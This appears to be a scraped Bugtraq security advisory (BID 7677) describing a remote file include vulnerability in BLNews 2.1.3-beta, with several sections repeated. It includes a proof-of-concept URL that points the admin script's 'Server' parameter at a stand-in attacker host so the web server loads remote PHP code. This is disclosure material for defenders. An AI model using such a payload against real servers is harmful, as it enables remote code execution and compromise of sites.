BLNews Remote File Include Vulnerability
BID:7677
Info
BLNews Remote File Include Vulnerability
| Bugtraq ID: | 7677 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | May 24 2003 12:00AM |
| Updated: | May 24 2003 12:00AM |
| Credit: | The discovery of this vulnerability has been credited to Over_G <[email protected]>. |
| Vulnerable: |
BLNews BLNews 2.1.3 -beta |
| Not Vulnerable: | |
Discussion
BLNews Remote File Include Vulnerability
It has been reported that BLNews is prone to a remote file include vulnerability. This is due to the incorrection initilization of some PHP headers within the application. As a result, an attacker may be capable of executing arbitrary PHP commands within the context of the web server.
This vulnerability is said to affect BLNews version 2.1.3-beta, however other versions may also be affected.
It has been reported that BLNews is prone to a remote file include vulnerability. This is due to the incorrection initilization of some PHP headers within the application. As a result, an attacker may be capable of executing arbitrary PHP commands within the context of the web server.
This vulnerability is said to affect BLNews version 2.1.3-beta, however other versions may also be affected.
Exploit / POC
BLNews Remote File Include Vulnerability
The following proof of concept URL has been supplied to demonstrate exploitation:
http://www.example.org/admin/objects.inc.php4?Server=http://www.attacker.org
The following proof of concept URL has been supplied to demonstrate exploitation:
http://www.example.org/admin/objects.inc.php4?Server=http://www.attacker.org
Solution / Fix
BLNews Remote File Include Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
References
BLNews Remote File Include Vulnerability
References:
References:
- BLNews Product Page (BLNews)
- PHP source code injection in BLNews (Over_G
)